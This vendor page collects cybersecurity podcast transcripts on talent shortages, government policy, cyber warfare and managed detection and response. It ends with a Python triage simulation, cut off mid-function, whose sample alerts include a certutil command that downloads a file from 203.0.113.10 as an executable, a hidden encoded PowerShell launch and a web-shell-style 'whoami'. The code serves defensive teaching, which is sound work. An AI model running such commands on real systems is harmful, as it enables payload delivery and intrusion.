Resource Type: Podcast

SON OF A BREACH! Episode 4: Celebrating Women in Cybersecurity with Didi Dayton

While women’s numbers in cybersecurity lag behind men’s, female leaders in our industry continue to pioneer the way forward. Episode 4 of our SON OF A BREACH! podcast series celebrates International Women’s Month with security visionary Didi Dayton, who joins host and CRITICALSTART Chief Technology Officer Randy Watkins for some timely insights into security growth investments and the expanding female influence in cybersecurity.

Dayton is a partner at Wing Venture Capital, responsible for Customer Markets and Programs. She has held executive positions in sales, channels, and alliances for more than 20 years across multiple successful cybersecurity companies, including hyper-growth organizations such as Websense, FireEye, and Tanium. 

She successfully led sales and channel teams at companies such as Symantec, Arrow, and Cylance (now Blackberry) through 12 M&A and integration activities. Didi has received CRN’s prestigious Channel Chief award four years running, and she was named to the 50 Most Influential Channel Chiefs and the Power 100 Women of the Channel.  

Tune in for expert perspectives on:  

  • Security investment strategy and trends 
  • Which leadership traits are most important for sales and channel leaders 
  • Mistakes CIOs and procurement teams need to avoid 
  • Why organizations benefit from women’s style of decision-making 
  • Dayton’s advice to women for success in leadership  

Dayton and Watkins also deliver shout-outs to some of the leaders who have influenced them most in their careers – who just happen to be women. 

Watkins also provides highlights of how SolarWinds’ testimony before the Senate Intelligence Committee became a blame game, plus the recent attack against Microsoft Exchange Servers by a suspected China-based attack group.


The Impact of Talent and Resource Shortages in Cybersecurity

It’s no secret – there is a severe talent and resource shortage in cybersecurity, but what is the impact it’s having on our businesses? CRITICALSTART’s Jordan Mauriello and Michael Balboni, former advisor to Homeland Security, talk about strategies to address cyber defenses given these shortages.

Full Transcript:

JM: Hey guys, Jordan Mauriello with CRITICALSTART here, Senior Vice President of Managed Services. Today I have with me Michael Balboni, President of Redland Strategies, former Senator, Assemblyman, advisor to Homeland Security. Honored to have him here with us today. We’ve been doing some awesome discussions about things that we’re doing at CRITICALSTART and working with Redland Strategies.

JM: Today we wanted to take an opportunity just to talk to Michael about some general cybersecurity issues. He’s a major influencer in our community. I know many of you already know who he is and that he has had a major impact even on some of the legislation that we’ve seen around our industry too as well. We want to take the time to get some thoughts from him on some of the direction the industry’s going and the impact that some of the changes we see in cyber in general are having on national defense, the role of Senate and Congress, and where that’s going from a legislative perspective.

JM: We’re going to open up and have a nice, fun conversation here about some of these issues. Thank you so much for being with us, Michael.

MB: Thanks for having me Jordan, and thanks for your service to the country in the military.

JM: Thank you very much, sir. I appreciate your support.

JM: Probably the next biggest problem in security outside the signal to noise ratio problem is talent, resources, and resource shortages. If you’re not a core competency in security or technology and then you’re trying to hire security and technology professionals, well now are you going to compete with organizations who are going to pay a premium for those because those resources are going to bring in revenue for those. I think it’s a big problem we see out there. Obviously, there’s a massive talent pool shortage, but it’s also so competitive for cybersecurity resources today.

MB: It’s funny. When I was back in the Senate, and this was a long time ago, 2005-2006, I actually introduced legislation to try to create scholarships at the State University level for the creation of cybersecurity courses. You’re absolutely right. There is an absence of well-trained cybersecurity. Other nation-states like China have basically institutionalized cyber hacking. They’re training all these cadres of soldiers to learn how to do this. I’m not saying we set up hackers, but I think in terms of understanding what the IT security dynamic is, we need to do a lot better at that with our institutions, our educational institutions. In the absence of that, a lot of companies are uncomfortable with offloading that responsibility of monitoring and responding to network threats. First of all, it’s expensive a lot of times and secondly, you don’t necessarily have control of everything that’s in your environment.

MB: A lot of companies might be dealing with sensitive information. Again, having insurance, having a well-qualified vendor, those are steps along the way, but there should be other strategies where you can internalize your cyber defenses so that you can give assurances to the board of directors, to your shareholders, to your customers and frankly to your staff that you have worked through all the different possibilities of what cyber could mean and you’re going to continue. You’re going to make sure that the systems you’ve set in place will create a business as usual environment.

JM: That’s a great answer. I think it’s a great way to approach the board is that you’re talking about helping keep business as usual as the primary goal and focusing on your core competencies.

Government’s Role in Cybersecurity

What role does the government play in cybersecurity? Is it a private sector or government responsibility? Find out what CRITICALSTART’s SVP of Managed Security, Jordan Mauriello, and Michael Balboni, President of Redland Strategies, and former Senator, assemblyman, advisor to Homeland Security, had to say about this issue and more.

Full Transcript:


JM: One of the things that I was really interested to talk to you about today and get your thoughts on specifically was, what role do you see Senate and Congress playing in cybersecurity here in the near future? Obviously, I think you were a big proponent of even some of the involvement, the debate that happened over the last couple of administrations. How do you see some of that playing out here in the future?

MB: Ever since the Bush administration, after the 9/11 attacks, there was a focus on cybersecurity. As the threats began to evolve in 2004, 2005, there were changes to the way we did intelligence or changes on the outskirts of the cybersecurity. What happens is every time there’s a bill that Congress or the Senate puts forward to try to set up goals for what cybersecurity, cyber resiliency, cyber compliance should look like, they will always be shot down. A lot of times, it was the US Chamber of Commerce that would come in and sit there and say, “You know what? We don’t think that changing the rules by which people play is going to be an effective strategy because the rules change as the threat changes, as the landscape, as the IT develops and evolves.” What’s happened is the administrations, whether it’s Bush, Obama, Trump, have all come back and they’ve said, “Let’s do it by presidential directive.”

MB: It actually morphed into Obama, the Homeland Security privilege … sorry, cyber resiliency, which I think was the first way they started and they had a presidential directive that basically set up a guideline. Now what’s also happened is that the regulatory agencies, the Securities and Exchange Commission, the CMS, the Office for Privacy and the Health and Human Services, they’d come out with very rigid guidelines as to how do you protect personally identifiable data, how you protect patient health information. They’ve set up all these requirements that really follow the National Institute of Standards and Technology Standards that a lot of people sit there and say, “Okay, this is what we ought to be doing but they’re more advisory at this point in time than actually you have to comply with them.” We’ve seen the goalposts of what constitutes a cyber secure society move as different players get involved if an industry is regulated.

MB: If you went to the library of Congress and when you grabbed into the shelf and wanted the book on cybersecurity and in the United States, you wouldn’t find it. There’s all sorts of different rules and regulations, and therefore you have a different kind of compliance bandwidth on that. Congress and the Senate are trying to wrestle with this all the time. They know the threats and the huge issues as it place to local government but then there’s this big issue that you and I’ve talked about it.

MB: What is the role of government in cybersecurity? Is it a private sector of responsibility and not a government responsibility? It’s two schools of thought. One is, you view cybersecurity as bricks in a wall, and every time a corporation does something that makes us more secure, every time a government agency does something that’s more secure, it builds up the wall of defense.

MB: Therefore, there’s a real role that the private sector needs to take on their own. We should incentivize them to get really serious about cybersecurity. The other school of thought is it really is the government’s responsibility. If, God forbid, the Canadians became bellicose and started attacking Plattsburgh, New York, right on the border, certainly you’d have all of DOD’s assets coming into Plattsburgh and protecting them. There’s the school of thought that says, “No, no, no, no, no. This is a national security initiative and a priority, and therefore the federal government should be funding, they should be providing expertise and they should be providing monitor and response to any type of cyber incident.” We’re really good. We have not as a country, we’ve really not come to one decision as to how we’re going to handle cybersecurity.

JM: Yeah, I think it’s a fascinating thought that you shared about. If we looked at kinetic warfare, the response is always that the federal government absolutely is responsible, but we see so much happening in the cyber warfare landscape where it is nation-state actors, given attribution is always a challenge in any of these cases, but we do know based on the sophistication and even other intelligence mechanisms that we’ve had these kinds of issues. How do we draw that line? How do we find out what is the right response? How much should the federal government be involved? What is their responsibility? I think it’s a challenge in something that we’re going to continue to be working through over the next 5-10 years and the next following administrations too as well.

Fighting the Unknown: Next-Generation Cyberattacks and Vulnerabilities

In next-gen cyberattacks and vulnerabilities, you’re fighting the unknown. Building a catalog of trusted behavior to use as a baseline to determine what falls outside normal business variances is one such strategy to change the paradigm of response. CRITICALSTART’s Jordan Mauriello and Michael Balboni, former advisor to Homeland Security and President of Redland Strategies, talk about trusted behavior and evolving strategies.

Full Transcript:


MB:  Maybe we need to change the whole paradigm of how we look at threats. Are we looking for the bad or should we look at behavior in a trusted kind of way? And maybe build a database, a registry, if you will, to be able to catalog what are the normal course of business operations that we know are trusted behavior and maybe create that baseline that if there’s a variance of that, that we can instantly go and say, “Whoa, that’s what we have to take a look at,” and everything else, you push it back and say, “No, no. Not coming in.” I think that might change the paradigm of response. I’m really interested in that strategy.

JM:  Obviously, we agree with you on that one fundamentally as it’s part of our model even here is working off of a model where you’re building a trusted behavioral registry. I think that’s a paradigm shift that the industry has to seize. We constantly play this game where we’re chasing the known bad and always looking for how to identify bad in a higher fidelity mechanism or to add more detail enrichment to known bad, so that we can find it in this massive sea that we talked about earlier.

JM:  It’s not working for a couple of reasons. You just talked about the attacker advantage. The attacker advantage is they only have to be right one time, right? We only have to be wrong one time to lose. The expectation that we would hit 100% as defenders is unrealistic. That’s why we have to have that resiliency. I think that’s why the model, the paradigm for analytics, for how we look at data insecurity has to be shifted so dramatically because we are not catching up. We’re definitely falling behind when it comes to that mechanism.

MB:  We’re really obsessed with the infrastructure of security and we’re not data-centric. It goes back to your original comment about how we triage what we need to protect. You don’t need to protect everything. No, you don’t. I’m not saying that you should tolerate intrusions, tolerate breaches, but you should at the very least focus all of your efforts on protecting the main point of your company, your business, the people you serve, which is their data and the data you have as your company.

MB:  From that perspective, we’ve got to be able to stop anything from getting into that environment. The question becomes “How do we do that effectively, timely?” One of the things that really gets me crazy is when I hear about the dwell time stories, that is the amount of time that malware will sit on a network before it’s discovered and addressed. In that time, so much damage can be done.

MB:  As we talked about beforehand, surveilling the network for vulnerabilities, surveilling the network for assets that you might want to raise up in terms of their profile, we want to go get this stuff and then being able to use, to recognize other avenues to get into other networks. A lot of times, what we’re seeing now is that one of the attacks that will be used is to take a network and make it into a bot network and basically commandeer that network and say, “Okay, now we’re going to use it and we’re going to attack others,” and then you send a note to the network administrator saying, “By the way, we’ve compromised your network. We’re going to use your network to attack others unless you pay this amount of ransom.”

JM:  There’s no lack of invention or creativity from the development of different threat factors, but there is a lack of imagination when it comes to how we prevent those things from happening because we’re stuck in this defense, this castle keep type of mentality.

JM:  I completely agree and I think you’re right. You see all these different creative mechanisms in the attack. You’ve talked about turning it into a botnet, whether that’s for attack or even for what we call crypto-jacking today. They’re going to take those systems and use the computing resources to mine cryptocurrency. We have all these creative mechanisms. Again, getting back to monetizing that threat. I think the dwell time remarks are dead on. I think some of the reports we’ve seen from some of the big players doing threat intelligence in our space, their scathing analysis of our industry’s capability when we’re looking at dwell times in excess of 45, 80, 120-day dwell times as averages in different sectors in our industry.

JM:  You definitely see this massive difference in organizations and capability and there’s not a standard set maturity.

Cybercrime: The Monetization of Security Threats

How do you stop the burgeoning field of cybercrime? From ransomware to malware as a service, the monetization of security threats is growing. Yet given this literal fire hose of threats, how do security teams efficiently and effectively identify real threats? CRITICALSTART’s Jordan Mauriello and Michael Balboni, former advisor to Homeland Security, have some thoughts on this issue.

Video Transcript:


JM:  One last thing I’ll ask you before we wrap it up here today. If you could make one recommendation to C-suite executives about cybersecurity and risk, what would that recommendation be today?

MB:  The recommendation would be to spend time thinking about your data and what needs to be protected. How are you protecting it today and is there a better way to identify the threats? The old metaphor I use is if you knew where a fire was going to break out during the year, you knew the day and the time that a fire was going to break out, even on a place like my home area of Long Island with 3 million people, but you knew where a fire was going to break out, you would only need one fire department.

MB:  They could go there and they can wait, what’s going on? The same analogy works with, if you knew where threats were coming from and you could actually resolve and get rid of so much of the uncertainty and only focus on the things that really mattered that went after your core data and you could stop that, that’d be such a better use of time, much more cost-effective and frankly give you the surety that you have the ability to identify and stop a threat. That’s really where I want CISOs to get to.

JM:  That’s great. Well, I so much appreciate your time. Thanks for being here with us.

MB:  It’s been great working and collaborating with you. This is a really important topic.

JM:  It’s a pleasure. All right. Well, thank you guys for joining us today. We appreciate it and hope you enjoyed our topics.

Cyber Warfare: How Wars May Be Fought in the Future

How will wars be fought in the future? Are we keeping up with the times in cyber warfare as a nation? As these questions linger, one thing we do know: the U.S. has woefully under-resourced the country’s cyber defense as we have not decided which critical assets need protection. Former advisor to Homeland Security Michael Balboni shares insights with CRITICALSTART’s SVP of Managed Security, Jordan Mauriello, on cyberwarfare and what the U.S. needs to do to prepare.

Full Transcript:


JM: How do you think specifically when we talk about how wars are going to be fought in the future and we look at what national defense mechanisms we have and how those have to change? How do you see that evolving and do you think that we’re staying up to speed and with the times from a cyber warfare perspective as a nation?

MB: I think that we have woefully under-resourced our cyber defense. The reason why I said that is because we have not decided what are the critical assets we need to protect. You can decide that there’s a triaging of national assets and national vulnerabilities that we need to fix collaboratively, that the private-public partnership should and is the model, particularly if you adopt some of the standards like that NIST standard we referred to before. At the same time we haven’t really decided, “Well, is it power plants we need to really focus on? Is it healthcare?”

MB: We’ve seen the “WannaCry” ransomware attack and the Ryuk attack that have convinced the world, “Boy, it’s pretty easy to get a worm into a network, be able to search across the entire network, find vulnerabilities in that.”

MB: In the case of WannaCry, of course it was the Windows program that had been unsupported, unpatched and then spread throughout the world, throughout the globe, and have potentially dramatic impacts on how things happen. Of course, whether it was the British hospital network, whether it was the Maersk shipping where ports actually were close to being shut down, these things that have a global impact, we have not figured out first of all how to classify them. Is that an act of war? If you knew, if you could really prove that a particular nation-state perpetrated this act, is that an act of war? Do you go from the digital to the kinetic? In addition, our intelligence community, we want to know who is attempting to get at us.

MB: We want to know their level of sophistication. We want to know what assets they have available to them. We want to know where they’ve been beforehand because everybody in the cyber world understands that it’s not like you weaponize a payload, distribute it into a network, and then immediately begin executing commands to either steal data or to interrupt the operating network. They may lay dormant, dwell time is what we call it, where they’re going to wait and they’re going to basically surveil the operating environment and see what other vulnerabilities exist to see what other assets they could go after. Map that and then get that information out to their controllers to say “So, here’s what you could go after. You tell me where and when you want to go after.” There’s no immediacy of the attack and response.

MB: The last piece is we walk around with our cell phones and we have more computing power on our cell phones than they had on the first lunar lander.

MB: It’s ubiquitous computing. Matter of fact, there’s a statistic that by 2023, I believe it is, there will be 7 billion phones on the planet. Much more than obviously the population of the earth. Each one of them has the ability to communicate, to calculate, to transmit data, and therefore, become a single point of entry into a network.

MB: How do you secure all those endpoints and how do you make sure that people are aware of the fact that they have a vulnerability that they’re walking around their pocket with? A lot of information needs to get out there. A lot of understanding, awareness, and then strategies and solutions.

CRITICALSTART & ePlus | National Cybersecurity Awareness Month Podcast

Full Transcript:

LW: Welcome. Thanks for joining everyone, my name is Lee Waskevich, vice president of security and networking strategy here with ePlus. Today, I’m joined by Randy Watkins with CRITICALSTART.

RW: Hey! Thanks for having me on.

LW: Absolutely, absolutely. Appreciate you joining us.

LW: So, we’re going to run through a few different questions today, mainly regarding managed detection and response. We’re seeing a ton of activity in speaking with our clients around the subject, customers that are dealing with attack vectors, moving workloads into the cloud. They’re struggling with retaining talent or training talent, being able to provide a strong sense of security operations. From your vantage point with CRITICALSTART, why do you see MDR gaining so much attention?

RW: There’s a lot of traction in the space and there’s multiple reasons for it. Something that we come across, pretty generally when customers are looking at MDR, is the ability to provide 24×7 monitoring.

RW: So, that’s something that is kind of being amplified in terms of importance because of nation-state sponsored attacks or crime-based attacks that are overseas. And they operate on much the opposite schedule than a typical eight to five security team does. So, just that availability of 24×7 response is driving the overall MDR market.

RW: Another thing that we see pushing us forward in terms of MDR momentum is operationalizing technology. I’m sure everybody’s seen it or been there, done that. But you look at the technology that a customer has or that an organization has, and they’re not using any of it. It’s kind of there but it’s not plugged in, or it’s plugged in and nobody is looking at it. And what that results in is kind of wasted resources. And as resources are so limited, organizations really have to take advantage of everything that they have and that means fully operationalizing their technology.

RW: Well, you kind of talk about the lack of resources in the space and how hard it is to attract and retain those resources and, you know, kind of transferring that risk of the resource is a good choice for organizations that want to be able to operationalize their technology.

LW: Ok, great. Yeah, we see that as well. You know, consulting with clients and their security program, relooking at their architecture, we see a lot of shelfware out there. You know, they’ve made good, strong choices, but I think they get drawn into the day to day type stuff and they never go back and optimize, they never go back and integrate those technologies. So, a service like MDR helps to put a lot of that operational piece together.

LW: How about from the size of organizations that are good candidates for MDR? Can you comment on what you see in terms of who makes a good customer for Managed Detection and Response?

RW: Yeah. So, when we started the MDR business about five years ago, we really thought that our average customer size was going to be between 500 and 1,000 users. We figured that was a sweet spot and we really looked at it like that because we figured the larger organizations, the enterprises, people with 5,000, 10,000, 50,000 users. They were going to have a more mature security program. And we started to really market towards the SMB space, that 500 – 1,000 users.

RW: Well, what we found after the first year was our average customer size is about 1,500 and growing. And it was because, although we’d love to assume that large organizations have much more secure environments, that wasn’t necessarily the case.

RW: So, now what we see is kind of broad adoption of MDR from the 10-person dentist office, all the way up to, you know, we have customers that are 100,000 users. And it’s because of what you just talked about.

RW: They’re continuously going from implementation to implementation to implementation. They never really get to operationalize the technology. So, they install a SIEM, they install IDS, they install an EDR, but they’re not really getting anything out of it, because when they get done installing it, they move on to the next project. They never get to resolving those alerts. So, even the larger organizations are having a difficult time getting the resources to both implement and operationalize the technology.

RW: So, right now our average customer size is probably somewhere in the 8,000 users range, but we have customers that are 100,000 endpoints, we have customers that go through MSPs that are 10 endpoints. There seems to be no bounds as to what a good market for managed detection and response is.

LW: Ok. So, it really can cover any size and scope of an organization as long as they have the guidance to see, “Hey, we really need to spend some, some focus on operationalizing things.”

LW: You know when you, when you look at managed detection and response, you know, the detection and response piece was, you know, kind of came along for the ride with endpoint detection and response. We saw technology providers, software, around that endpoint shift over the past 18, 24, 36 months. Why do MDRs focus so much on the endpoint and how does CRITICALSTART use that in relation to their service?

RW: There are two main reasons that we focus on EDR. One, it’s a definitive source for information. And what I mean by that is, think from an analyst perspective about what you’re going to do when you get a firewall alert or an IDS alert or, I mean, most types of alerts. If I get, for instance, a blocked outbound C2 communication, the first thing that goes through my head is, “what’s happening on that endpoint that is causing it to communicate outbound to a C2”, right?

RW: So I’ll want to identify the process that’s trying to communicate, the user context, how did that process get there. I really want to dig in and figure out, not the nature of the network request, but what’s making that network request.

RW: So, that’s the first reason. The second reason is because the endpoint is the best place for response. I mean, there are really two places you want to be able to respond, and that’s on the endpoint and via Active Directory by disabling user accounts.

RW: We have managed detection and response, and we really look at the endpoint as a great way for us to respond.

RW: We did, for a while, block things at the firewall and what we found was users are mobile. They would take their laptop home and all of a sudden they’re beaconing out again. So, that’s why we have a focus on endpoint.

RW: Now at CRITICALSTART, we make very, very deep technical integrations. What we do is, we’ll use APIs to pull in the alerts that are created by these different endpoint products, and then we use the APIs to go back and get additional information, as well as performing those response actions.

RW: So really, we’re making our integration so tight that our analysts and our customers can work through our platform to do just about everything they can do inside of that endpoint. And what that does is it breeds efficiencies.

RW: The endpoint is really a strong place for us to kind of leverage the technology to not only create the service but also gain that efficiency of keeping all of our analysts in a single queue, in a single platform.

LW: Okay. All right great. That makes a ton of sense. I think another unique aspect is your model for resolving alerts, right? Many SOCs and MSSPs and customers that try to do it on their own, they deal with alert fatigue because there’s so many events and things like that coming in. Can you talk about how you accept risk and the models that you have around resolving alerts?

RW: Yeah. So, in terms of risk acceptance, we don’t, right? Because that’s on the customer to do. I think it’s important that you called out MSSPs, MDRs, as well as internal SOCs. They all suffer from the same issues, which is that we’ve looked to security products, we’ve looked to manufacturers, to be extremely effective at detecting attacks.

RW: The problem is, when you’re effective at detecting attacks, you’re typically over detecting as well, right? It’s always better to err on the side of a false positive.

RW: So looking at how MDRs, MSSPs, and in-house SOCs, looking at how they respond to these alerts that are coming in and the false positives. There’s really two ways that we’ve seen organizations deal with this. The first was what we call input-oriented, where you’re essentially shutting off speeds and feeds that are maybe lower fidelity or that garner too many alerts. And the problem with that approach is, you’re accepting unquantified risk. I mean, you’re accepting risk that you don’t quite know you have because you turned off the product’s ability to detect that risk.

RW: So that kind of makes the product less effective, and what ends up happening is, you get breached and you go, “Why didn’t we pick this up?” Well, because you had to turn off the rule.

RW: The second way that we see is called prioritized or priority oriented. This one is extremely common. We see it in SOCs, we see it in different MDRs and MSSPs. And this is where you kind of start at the top of criticality and you work your way down the stack until you run out of resources.

RW: So, “Hey, we’re going to look at criticals. If we have enough time, we’ll look at highs.”

RW: Most organizations never get to the mediums and lows. The problem with that is you’re accepting quantified risk. So now you know that it’s risky, you have it up on the board in your SOC, but you say, “Oh, it’s a medium. We don’t have the resources for it, so the business is going to accept that risk.”

RW: And that one’s kind of dangerous because we have pretty well-documented cases of multiple times when an alert has shown up in a SOC, but it was a medium or low and it got kind of brushed off, and then it resulted in significant breaches, executive-level turnover, massive disclosure, billions of dollars in loss.

RW: So, when we started the MDR, the goal was to not do any of that. Hot tip for anybody watching: if you want to accept risk, you don’t have to pay anybody to do that. You can just do that by yourself.

RW: So our model seeks to accept no risk. So what we do is, we look at every single alert that a product generates, that a security product generates, and we resolve every single alert that comes in, so we’re not accepting risk and we’re not limiting the effectiveness of the product.

LW: Ok. Yeah, makes a ton of sense. You’re taking it all in. You’re the ones making the determination on that through your technology, through your skills and training. Alright. Excellent. Yeah, that makes a ton of sense.

LW: I think another important piece, outside of what you mentioned about how you do so much around technology integration, leveraging the technology stacks that a customer has, is that there’s also a people component to this, right? Because when a customer interfaces with their service provider, especially a security service provider, many times it’s over email, or they’re picking up the phone and calling someone. Can you talk a little bit about CRITICALSTART’s culture and the analyst retention rate that you guys have?

RW: Yeah. So, we consider ourselves a technology-enabled service. And when you look at the spectrum there are kind of two sides and then the middle. So on the two sides, you have MSSP on one side. They view this as a people problem. We’ll throw more people at it, throw more people at it, throw more people at it. That usually results in high turnover, because you’re not solving the underlying problem.

RW: But then there’s a SaaS model. The SaaS model says this is purely a technology problem and we’re going to create a platform that does all this automatically.

RW: And then there’s kind of tech-enabled services that sit in the middle and that’s where we are.

RW: So what we did was we created the platform first that helps us resolve every alert. And then we found a way to kind of avoid analyst burnout. If you look at the number one reason for analyst turnover, it’s because they’re all looking at the same alerts over and over and over and over every day, and there’s no resolution. So, we built a platform that allows us to get rid of that problem by resolving every alert, and then once we see it once, we’ll automatically resolve it in the future.

RW: Well, what that has led to is a 99% employee retention across all of our SOC analysts. We’ve lost one analyst in the last five years. And what that means is, we can spend a tremendous amount of time, energy, resources, money training these analysts to be fantastic, world-class analysts. There’s an old adage I love to refer to: would you rather train an employee and risk them leaving, or not train an employee and risk them staying? Well, if we solve the problem of them leaving, then we can sink the resources into training them and making them world-class analysts.

RW: So, all of our analysts go through about 160 hours of training before they ever touch or see customer data. After that, when they become an official tier-one analyst, they know how to get to tier two, and that involves x86 and 64-bit programming classes so they can start to reverse malware. Now that’s just at tier two. There are tier three and tier four as well. They get into threat intelligence and campaign identification, as well as different leadership roles.

RW: So really what we did was, we created the technology that really encourages people to stay and it kind of gets rid of the mundane, so every alert they open up has the potential of being a new APT, a new piece of ransomware, a new piece of malware. And then we train them to really dive into every single one of those alerts and what the result is, is a fantastic service for customers where they feel like they have a world-class SOC at their fingertips because they actually do.

LW: Gotcha. No, that makes total sense and it does provide, I think from putting myself in the customer’s shoes, a higher level of confidence in the resources that are helping me to operate my security and to help detect and respond against those threats. So that’s great. Thanks.

RW: To add on there, what we see is customers being able to elevate their resources, because of our resources. So we go into a lot of organizations especially these ones that have 10, 15, 50,000 users. They already have a security team. It’s not enough to provide full 24×7, but there is a security team there.

RW: And a lot of times when we come in, the analysts on the team they’ll start to have this whole “are you outsourcing my job” type mentality. No, no, no, no. We’re taking the tier-one and two. We’re gonna escalate things to you to be responded to. You get to elevate your position to incident responder to pentester to threat hunter. You get to get rid of this, “Hey, I’m looking at all of these alerts today,” and you get to really move into, “I’m going to find something unique, interesting, truly different inside of my environment.”

RW: So, our resources and the training that we put into that really kind of allow the customer to elevate their limited resources to positions that are more valuable to the company.

LW: Right. Yeah, that’s especially true right now, especially as budgets are tightening and others want to make sure the resources are being used for what they were hired to do or what they have the capabilities to do.

RW: Exactly!

LW: That’s where the strength is going to be. Very much agree.

LW: Last question. We’ve been having this conversation a lot around, you know, this is being recorded in fall of 2020, so since the March time frame, since everything that’s gone on globally this year. What has changed in your world since that time, and what are you seeing from both, you know, the CRITICALSTART standpoint of the security spectrum, if you will, of all of these threats and alerts, as well as your dealings with clients? Any insights you could provide there?

RW: It’s been a rough couple of months, right? I mean, a lot of organizations are trying to adapt and figure out how to keep their business operational during this time of COVID. We’re seeing a lot of users go to work remote, including the security team. And what most organizations that we’re talking to, or dealing with, or that we’re exposed to, are asking is, “hey, how does my security scale across all these remote users?” Because when users go home, regardless of whether they’re using a corporate asset or a personal asset, they’re more likely to do things that maybe aren’t work-related that generate more and more alerts. So, what we’re seeing is a lot of users going to work from home or working remotely and then a spike in alerts, but because the security team is now all remote there’s an inherent efficiency loss. So, you have more alerts, you have less efficiency on the security team, and you have to deal with every one of them because hackers see this as a great opportunity.

LW: Yeah, exactly.

RW: From an attacker’s perspective, never let a crisis go to waste, right? So, we’re seeing massive email campaigns with a ton of COVID attachments, we’re seeing a lot of drive-by downloads, we’re seeing a lot of spear phishing, we’re seeing a lot of email compromise, we’re seeing a lot of whaling. I mean, kind of all the attacks are starting to bubble up, not just because COVID is a great excuse to send out an email, but also because it’s very difficult for me to kind of yell across the room and say, “Hey, are you sure you want me to transfer this money?”

RW: So, this whole remote worker issue combined with the hot topic of COVID for attackers to leverage, is really just spiking the alerts. From our perspective on the business side, we’re seeing a lot of customers come to us saying, “how do we remedy this.” And we have a pretty obvious answer, you know, Managed Detection and Response. Let us take the tier one or tier two and some of the response capabilities, use your limited resources to help deploy policy or provide user education, and let’s see if we can drive up the security posture of the organization although everybody is remote.

RW: So, it’s kind of this perfect storm that we’re trying to fight against and it’s a unique battle.

LW: Yeah, exactly. We see the same thing from the ePlus side and it’s about helping that customer to drive their program forward. So yes, this Managed Detection and Response becomes a very, very important piece of that. And dealing with, you know, preying on the curiosity of people, preying on the fact that everyone is so distributed, there’s a lot of weak areas of the chain, if you will, that can be exploited and without the proper controls and without proper emphasis and focus on it, it’s really difficult for organizations. And we see it every day in the news, something different on either a breach type attack, a lot of ransomware being hit. All those pieces can be mitigated to a degree with the proper precautions being taken. So awesome. I appreciate that.

RW: Yeah, and that’s another reason why we focus on the endpoint. Gartner has their triad of logs, network, and endpoint, and nothing against network, but when all of your resources are distributed and you don’t have always-on VPN backhauling all the traffic, network kind of wanes in importance.

RW: But you’re going to have an agent, right? So, we focus on endpoint because it allows us to reach out and touch those remote resources and still maintain some level of visibility and protection even when the users are working from home using a SaaS-based application.

RW: We’ve had to find better ways to go out and work with those remote resources. A lot of customers that we’re talking to are reevaluating their endpoint solution to make sure that it’s the right one, because now that’s growing in importance. We’ve done a lot of consultation with ePlus and customers saying, “Hey, let’s have ePlus work through all your different requirements and find the right solution, then we can sit on top of it and manage it”.

RW: One of the big perks for CRITICALSTART is, we don’t just tie into one solution. We support multiple endpoint products. So, ePlus can really go in, do some consulting with a customer and say, “Hey, based on your requirements your organization, this is probably the best solution for you,” and CRITICALSTART can then come on over top do that tier one and two to really not just promote the resources necessary, but also the correct solution.

LW: Right, and bringing that full circle, then there’s faster time to operation, right? And actually finding that efficiency with the purchase that’s being made, with the investment that’s being done, rather than trying to sit there, integrate, slowly roll it out. With CRITICALSTART services on top right away, you’re immediately recognizing that value. Awesome.

LW: Well, thank you, Randy. Once again this has been Randy Watkins, CTO with CRITICALSTART. Don’t let the guitars and black t-shirt fool you. It’s not Dave Grohl even though a few times I thought it might have been. I’m sure Dave Grohl knows much about MDR, but again this is Lee Waskevich. I’m vice president of security at ePlus. Thanks for joining.

RW: Thanks, Lee.
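The three alert-handling models Randy lays out above (input-oriented, priority-oriented, and resolving every alert with automatic resolution of repeats) can be made concrete with a small simulation. This is an added example written for this page, not CRITICALSTART’s platform or any product’s code. The alerts, hosts, paths and command lines are constructed, the analyst verdict is a stand-in heuristic, and the choice of which fields define “the same behaviour” for auto-resolution is an assumption of the example.

```python
"""Alert-triage models simulated on constructed data.

  input-oriented     - switch off noisy feeds (unquantified risk: you never see it)
  priority-oriented  - work criticals downward until capacity runs out
                       (quantified risk: mediums and lows sit on the board unreviewed)
  resolve-every      - review every alert once, then auto-resolve repeats of a
                       behaviour an analyst already dispositioned as benign
"""
import hashlib
import re
from dataclasses import dataclass

SEVERITY_RANK = {"critical": 4, "high": 3, "medium": 2, "low": 1}


@dataclass(frozen=True)
class Alert:
    id: int
    source: str    # product that raised it: edr / ids / siem / firewall
    severity: str
    host: str
    process: str   # endpoint context, as if already enriched via the EDR API
    parent: str
    cmdline: str


SVCHOST = r"C:\Windows\System32\svchost.exe"
SERVICES = r"C:\Windows\System32\services.exe"
BACKUP = r"C:\Program Files\Backup\backup.exe"
CERTUTIL = r"C:\Windows\System32\certutil.exe"
CMD = r"C:\Windows\System32\cmd.exe"

# Constructed sample alerts: hosts, paths and command lines are made up.
ALERTS = [
    Alert(1, "edr", "low", "ws-01", BACKUP, SVCHOST, r"backup.exe --job 1042 --target \\nas\share"),
    Alert(2, "edr", "low", "ws-02", BACKUP, SVCHOST, r"backup.exe --job 1043 --target \\nas\share"),
    Alert(3, "ids", "high", "ws-03", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
          "powershell.exe -nop -w hidden -enc SQBFAFgAIAAo"),
    Alert(4, "siem", "medium", "srv-01", CERTUTIL, CMD,
          "certutil.exe -urlcache -split -f http://203.0.113.10/a.txt a.exe"),
    Alert(5, "firewall", "critical", "ws-04", r"C:\Users\bob\AppData\Local\Temp\update.exe",
          r"C:\Windows\explorer.exe", "update.exe /silent"),
    Alert(6, "edr", "medium", "ws-05", SVCHOST, SERVICES, "svchost.exe -k netsvcs -p -s Schedule"),
    Alert(7, "edr", "medium", "ws-06", SVCHOST, SERVICES, "svchost.exe -k netsvcs -p -s Schedule"),
    Alert(8, "edr", "low", "ws-07", BACKUP, SVCHOST, r"backup.exe --job 1044 --target \\nas\share"),
    Alert(9, "siem", "high", "srv-02", CMD, r"C:\Windows\System32\inetsrv\w3wp.exe", "cmd.exe /c whoami"),
    Alert(10, "ids", "medium", "ws-08", CERTUTIL, CMD,
          "certutil.exe -urlcache -split -f http://203.0.113.10/b.txt b.exe"),
]


def behavior_key(alert: Alert) -> str:
    """Fleet-wide key for 'the same behaviour' (assumed fields): source, image,
    parent, and the command line with numeric tokens masked (job ids, PIDs).
    Host is excluded so one disposition applies across the fleet; image and
    parent stay in so certutil under cmd.exe never inherits trust from
    certutil under a legitimate installer."""
    masked_cmd = re.sub(r"\d+", "#", alert.cmdline.lower())
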